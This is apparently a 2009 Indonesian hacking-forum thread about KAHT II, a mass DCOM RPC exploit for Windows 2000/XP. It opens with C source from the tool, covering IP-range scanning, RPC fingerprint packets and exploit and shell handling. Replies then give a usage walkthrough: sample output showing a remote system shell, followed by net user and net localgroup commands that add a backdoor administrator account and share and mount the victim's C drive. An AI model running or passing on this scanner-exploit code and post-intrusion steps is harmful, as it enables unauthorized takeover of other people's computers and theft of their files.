                                               #endif
						  strcat(linea,"\n");	// writes into the caller's buffer: checkea() passes a char[16], which a 15-character address already fills, so this can run one byte past it
			  			  if (peta==0)
							 {
								 w2k=fopen("win2k.txt","a");
								 if (w2k!=NULL)
								 	{ fputs(linea,w2k); fclose(w2k);}
								else printf(" !!UNABLE TO LOG IP %s",linea);

								}
						   else
							{

								wxp=fopen("winxp.txt","a");
								if (wxp!=NULL)
									{fputs(linea,wxp); fclose(wxp);}
								else printf(" !!UNABLE TO LOG IP %s",linea);
							}
						//} else 	printf("UNABLE TO CONNECT TO SHELL\n");
						} else 	printf("FAILED\n");
					}
					else printf("\n UNABLE TO CREATE SOCK2\n");
				}
				else printf(" FAILED to send Exploit2\n");
			}
			else printf(" FAILED to send Exploit\n");
		}

}	// sock is not closed anywhere in this function; checkea() closes it after attack() returns
//if (AUTOHACKING!=1)
	LeaveCriticalSection(&csshell);

}

/*********************************************************************************/
/* Advance the shared cursor ip1[] to the next address and format it into `ip`.
 * The cursor is stepped before it is used, so the very first address of the
 * range is never returned. Only the last two octets are walked: octet 3 runs
 * 1..254, then octet 2 is incremented; when octet 2 reaches 255 it is bumped
 * again together with octet 1. Returns NULL once the cursor is past ip2[]
 * (compared on octets 2 and 3 only — octets 0 and 1 are never compared),
 * otherwise `ip`, which must hold at least 16 bytes.
 * The increment runs under cs, but the end-of-range test and the reads for
 * sprintf() happen after the lock is released, so another worker may have moved
 * the cursor in between. */
char *givemeip(char *ip)
{

	EnterCriticalSection(&cs);


	if (ip1[3]!=254)
			ip1[3]++;
	else
	{
		ip1[2]++;
		ip1[3]=1;
		//return(NULL); //uhh!

	}
	if (ip1[2]==255)
	{	ip1[2]++; ip1[1]++;}	// leaves ip1[2] at 256, which exceeds any ip2[2] that passed main()'s range check, so the test below returns NULL

	LeaveCriticalSection(&cs);

	if (ip1[2]>ip2[2])   return(NULL);
	if (ip1[2]==ip2[2])
		if (ip1[3]>ip2[3]) return(NULL);

	sprintf(ip,"%d.%d.%d.%d",ip1[0],ip1[1],ip1[2],ip1[3]);	// at most 15 characters plus NUL while every octet is <= 255

	return(ip);
}

/******************************************************************************/

//int version(char *ip, int sock)

/* Probe the RPC endpoint on the already-connected `sock` to guess the target OS.
 * Sends peer0_0, waits up to RPC_FINGERPRINT_TIMEOUT seconds for any reply, then
 * sends peer0_1 and looks only at the length of the second reply.
 * Returns 1 when that reply is exactly 32 bytes (labelled WinXP), 0 otherwise
 * (labelled "Unknown" here, but attack() uses index 0 as the Win2k target), and
 * -1 when either wait times out (attack() then does nothing). `ip` is unused.
 * The socket is closed on every path except the inner timeout (the bare
 * "return(-1)"); two of those closes call closesocket() without the WIN32
 * guard, so the non-WIN32 build does not link. checkea() closes sock again
 * after this returns. send()/recv() return values are not checked. */
int version(char ip[16], int sock)
{
//derived by reverse engineering the ISS scanner.


unsigned char peer0_0[] = {	// first probe: DCERPC bind (0x05 0x00 0x0b ...)
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00 };


unsigned char peer0_1[] = {	// second probe: DCERPC request (packet type 0x00); only the reply length is examined
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x07, 0x00 };

/*

unsigned char win2kvuln[] = {
 0x04,  0x00,  0x00,  0x00,
 0x00,  0x00,  0x00,  0x00,
 0x04,  0x5d,  0x88,  0x8a,
 0xeb,  0x1c,  0xc9,  0x11,
 0x9f,  0xe8,  0x08,  0x00,
 0x2b,  0x10,  0x48,  0x60,
 0x02,  0x00,  0x00,  0x00,
 0x00,  0x00,  0x00,  0x00,
 0x04,  0x5d,  0x88,  0x8a,
 0xeb,  0x1c,  0xc9,  0x11,
 0x9f,  0xe8,  0x08,  0x00,
 0x2b,  0x10,  0x48,  0x60,
 0x02,  0x00,  0x00,  0x00};
*/
	fd_set fds2;
	unsigned char buf[1024];

	int l;	// byte count of the last recv()
	struct timeval tv2;
	FD_ZERO(&fds2);
	FD_SET(sock, &fds2);
	tv2.tv_sec = RPC_FINGERPRINT_TIMEOUT;
	tv2.tv_usec = 0;

	memset(buf,'\0',sizeof(buf));
	send(sock,peer0_0,sizeof(peer0_0),0);
	if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)	// select() may modify fds2 and tv2; both are reused below without being re-initialised
	{
		l=recv (sock, buf, sizeof (buf),0);	// first reply is read but never inspected
//		for(i=0;i<52;i++)
//		{
//			if (i==28)	i=i+4;
//			if (buf[i+32]!=win2kvuln[i])
//			{
				send(sock,peer0_1,sizeof(peer0_1),0);
				if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
				{
					memset(buf,'\0',sizeof(buf));
					l=recv (sock, buf, sizeof (buf),0);
					if (l==32)	// classification rests solely on the reply length
					{
						closesocket(sock);	// NOTE(review): not guarded by #ifdef WIN32 like the branch below
						return(1);//winxp
					}
					else
					{
				      #ifdef WIN32
					 closesocket(sock);
				      #else
					 close(sock);
				      #endif
					 return(0);//Unknown  (attack() treats 0 as the Win2k entry)
					}
				}
				else return(-1);	// only path that leaves sock open here
//			}


		//}
//		closesocket(sock);
//		return(0);//win2k
	}
	closesocket(sock);	// NOTE(review): not guarded by #ifdef WIN32
	return(-1);		//Unknown
}
/********************************************************************************/

/* Worker thread body: pull addresses from givemeip() until the range is
 * exhausted, attempt a non-blocking connect to port 139 with a CONNECT-second
 * timeout, record responders in results.txt (under cslog) and hand each one to
 * version()/attack(). Bumps the shared `threads` counter (under css) on entry
 * and exit. threadn is unused apart from the commented-out trace.
 * ioctlsocket()/closesocket()/_endthread() are Windows APIs; the visible file
 * provides no POSIX fallback for them here. */
void checkea(void *threadn)
{
	char ip[16];	// dotted quad; a 15-character address fills it completely (attack() appends to it)
	char ip2[17];	// log line "<ip>\n" — shadows the global ip2[] range array
	int sock,i;	// sock is not assigned until the first socket() call in the loop
	struct sockaddr_in target_ip;
	fd_set fds;
	u_long tmp=1;	// FIONBIO on/off argument
	struct timeval tv;


	EnterCriticalSection(&css);
	threads++;
	sleep(1);
	LeaveCriticalSection(&css);
	memset(ip,'\0',sizeof(ip));
	while (givemeip(ip)!=NULL)
	{
		//printf("Checking IP: %s\n",ip);
		target_ip.sin_family = AF_INET;
	   	target_ip.sin_addr.s_addr = inet_addr(ip);
                target_ip.sin_port = htons(139);	// literal rather than the PORT macro
		closesocket(sock);	// on the first iteration sock is uninitialised; on later ones it was already closed at the bottom of the loop
	    if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
	    {
			tmp=1;
			ioctlsocket( sock, FIONBIO, &tmp);	// non-blocking for the timed connect
			tv.tv_sec = CONNECT;
			tv.tv_usec = 0;
			FD_ZERO(&fds);
			FD_SET(sock, &fds);

		    connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));	// return value unchecked
			//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
			//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
		 //   else if (i==0) {
		//	   printf("i==0 ip: %s\n",ip); }
		  //  else
		  if((i=select(sock+1,0,&fds,0,&tv))>0)	// writable within the timeout is counted as an open port
		    {
				sprintf(ip2,"%s\n",ip);
				EnterCriticalSection(&cslog);
				fputs(ip2,results);	// return value unchecked; results.txt is not flushed here
				rpcopen++;
				LeaveCriticalSection(&cslog);
				attack(ip,version(ip,sock));	// version() closes sock on most of its paths (see version())


			}
		}
		closesocket(sock);	// closes the descriptor a second time whenever version() already did
		memset(ip,'\0',sizeof(ip));
	}
	EnterCriticalSection(&css);
	threads--;
	sleep(1);
	LeaveCriticalSection(&css);
	//printf("Thread %i exiting\n",(int)threadn);
	_endthread();

}

/******************************************************************************/

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jun 26, 2009 12:03 am
by d-e-s-t-r-o-y-e-r
maaf saya msh newbie bs jelaskan loe lage ngapain

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jun 26, 2009 1:31 am
by oki_machine
@ d-e-s-t-r-o-y-e-r
itu d'copy & d'paste ke borland C++, bis itu d'jlanin lwat perintah CMD!
cba baca yg ini kak! http://forum.cyberdos.org/viewtopic.php?id=1073 :mrgreen: :mrgreen: :mrgreen:
mav klw ada kesalahan dlm postqu kak!
aqu masi jaoh d'bwah newbie soalnya! hehe,,,,,,,,,
@wiLMaR_kiDz
mav kak, aqu mw nanyanih, apa kelebihan KAHT II dri KAHT I ?

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jun 26, 2009 2:00 am
by adiwijaya
kaht udah ga bisa dijalanin untuk XP sp 2 atau sp 3, itu cuma bisa jalan di sp1

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jun 26, 2009 9:51 pm
by wiLMaR_kiDz
oki_machine wrote:
@ d-e-s-t-r-o-y-e-r
itu d'copy & d'paste ke borland C++, bis itu d'jlanin lwat perintah CMD!
cba baca yg ini kak! http://forum.cyberdos.org/viewtopic.php?id=1073 :mrgreen: :mrgreen: :mrgreen:
mav klw ada kesalahan dlm postqu kak!
aqu masi jaoh d'bwah newbie soalnya! hehe,,,,,,,,,
@wiLMaR_kiDz
mav kak, aqu mw nanyanih, apa kelebihan KAHT II dri KAHT I ?
bener ,emang harus lewat cmd. kaht.exe-nya lngsung di drag & drop ke cmd, atau copy path-nya trus paste di cmd..
kalo g slh, kaht tu slah 1 nya buat vuln RPC DCOM dSP1.skarang d SP2 ma SP3 udh d Patch pastinya ama Microsoft..
tapi ane kmren ad baca2 (lupa dmn), ada bugs lewat windows kernel dSP2 n SP3.jd ntar bisa take over.ingat, wlwpun portnya kbuka, blm tntu berarti bisa qta exploit.tergantung aplikasi yg brjalan d atas port tuh juga...
klo emang gak vuln, berarti....... :putusasa:
*POC-ny :
kaht is DCOM exploit ,Langkah pertama yaitu: download program kaht II dulu, atw tgl copas yg neh atw yg di atas, atau (googling aj)trsrah ente.letakkan di direktori ssuai dgn keinginan ente.biasanya bntuk file dlm Zip.cba extract file trsbut.klo ud d ekstrak, kaht bru bsa d gunakan.

Next>> tentukan alamat ip target, misal : 192.168.0.12
selanjutnya : Kaht 192.168.0.11 192.168.0.12
Keterangan :
192.168.0.11 adalah IP (komputer tagret) awal
192.168.1.12 adalak IP (komputer target) akhir

krna disini kita akn mngexploitasi ip 192.168.0.12, kita gunakan
kaht 192.168.0.11, 192.168.0.12. krna ip 192.168.0.11 yg mrupakan range
trkecil, agr exploitasi brjjln lbih cpt ssuai dgn target kita. kl komputer target brhasil d exploitasi, maka akn muncul tmpilan krang lbih sbgai brikut :


------------------------------------------------------------------------
                        KAHT II - MASSIVE RPC EXPLOIT
              DCOM RPC exploit, Modified by [email protected]
               #haxorxitos && #localhost @efnet Ownz you!!!
                          Full VERSION :) AUTOHACKING
-------------------------------------------------------------------------
[+] Targets : 192.168.0.11-192.168.0.12 eith 50 Threads
[+] Attacking Port. Remote Shell At ports: 36388
[+] Scan in Progress....
- Connecting to 192.168.0.12
   Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
<C> Copyright 1985-2000 Microsoft Corp.

c:\WINNT\system32>
nah, smpai d sini, kita sdh brhasil msuk k komputer target dan kita
berada di directory: c:\WINNT\system32>
Sampai disini terserah ente mw malkukan apapun, sesuai keinginan ente.disini kita akn coba malakukn sharing file & mmbuka file sharingan
trsebut di komputer kita dgn trlebih dhulu mnambahkan user ID stingkat administrator.Utk mlakukan penambahan user di pc Target :


C:WINNTsystem32>net user paluared ck ck ck /add
                          ^         ^
                     nama_user    password_user
net user paluared idiot /add
The command completed successfully.
Ket : disini kita menggunakan perintah :


net user nama_user password_user /add
brdasarkan printah d atas, kita mnambahkan user paluared dgn password idiot, stelah user berhasil d buat, slanjutnya kita memberikan autority pd user paluared dlm groups administrator :


C:\WINNT\system32>net localgroup Administrators paluared /add
                                            ^             ^
                                  nama_group     nama_user                     
net localgroup Administrators paluared /add
The command completed successfully.
*Ket : d atas kita mnggunakan printah :


net localgroup Nama_gorups nama_user /add
brdasarkan printah d atas, net localgroup. berarti kita
mnambahkan user paluared k dlm groups administrator pd kumputer local (kompi target). administrators adlh groups dri administrator trsbt & utk paluared adlah nma user yg d tambahkan k dlm group administrator.stelah masuk, cb ente bwt user gruops administratornya :


C:WINNTsystem32>net user paluared such /add
                           ^       ^
                          user    password
abz tuh, msukan user paluared ke gruops administrator :


C:WINNTsystem32>net localgroup Administrators paluared /add
setelah itu sharing drive-nya :


C:WINNTsystem32>net share c=c:
catatan user id nya terserah ente, mw d ksih nma apa ssuai keinginan.hmm..klo utk mnggunakan sharing drive trsebut, bisa ente gunakan perintah net use. cranya??.pertama buka dos promt di komputer qta, lalu ketikkn brikut :


c:> net use * \\ip_address\drive_c * /u:paluared
Type the password for \\ip_addres\C:  <--- masukan password disini
*Ket : berdasarkan perintah diatas IP address adalh IP kompi target, dan drive_c adlah nma sharing drive dri kompi taget & utk u:/paluared bhwa kita msuk dgn mnggunakn user paluared (biasanya d dlm winxp/win2000, trdpt sharing defaultnya.yaitu : C$, d$ dst..
klo sang admin blm mrubah hal trsebut, kita dpt lngsung mlakukan net use atau tnpa mlakukan net share brdasarkan default sharing ini...
cat IP-Addres, bisa jg di isi dgn nama kompi. utk kterangan nya, ente bsa baca manualnya net use /?.stelah brhasil bisa liat d windows explorer.


C:\WINNT\system32>net share  drive_c=c:   
                                     ^      ^
                       nama_sharing  drive_sharing
net share  Drive_c=c:c was shared successfully.
*Ket : berdasarkan printah diatas, kita melakukan stelah sharing drive.yaitu drive C dgn mmberikan nama drive_C[/code]
Nahh...sekarang giliran ane boleh nanya kan?????.....
Apa stiap org udah pada pake sp3?????.......
belum tentu mas. . . . . :putusasa: :putusasa: :ngakak: :ngakak: :ngakak:

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Sun Jun 28, 2009 7:14 pm
by franky_muchtar
KAHT II sudah lama sekali..
Cobalah pke exploit samba port 445....

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jul 03, 2009 8:06 am
by untitled
Kakak, Kaht II nyerang port brapa?? 135 yach??
g pernah coba kaht II yang di download dari internet, ip nya vuln, tapi gak bisa di serang / take over.. kenapa yah??
tq....

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Sat Jul 04, 2009 11:42 pm
by gblack
Belajar Metasploit ama rumput_kering gih...
Dia bs jadi juara II JogjaHack kan make Kaht :mrgreen:

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Sun Jul 05, 2009 2:19 pm
by wiLMaR_kiDz
untitled wrote:Kakak, Kaht II nyerang port brapa?? 135 yach??
g pernah coba kaht II yang di download dari internet, ip nya vuln, tapi gak bisa di serang / take over.. kenapa yah??
tq....
adiwijaya wrote:kaht udah ga bisa dijalanin untuk XP sp 2 atau sp 3, itu cuma bisa jalan di sp1
ngelih wrote:KAHT II sudah lama sekali..
Cobalah pke exploit samba port 445....
tuwhhh....denger apa kta Guru gblack.... :malumalu: :malumalu: :malumalu:
mkanya ane brani share in... :ngakak: :ngakak:

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Mon Jan 25, 2010 6:06 am
by franky_muchtar
Use Metasploit....
More powerfull...

http://web-vuln.blogspot.com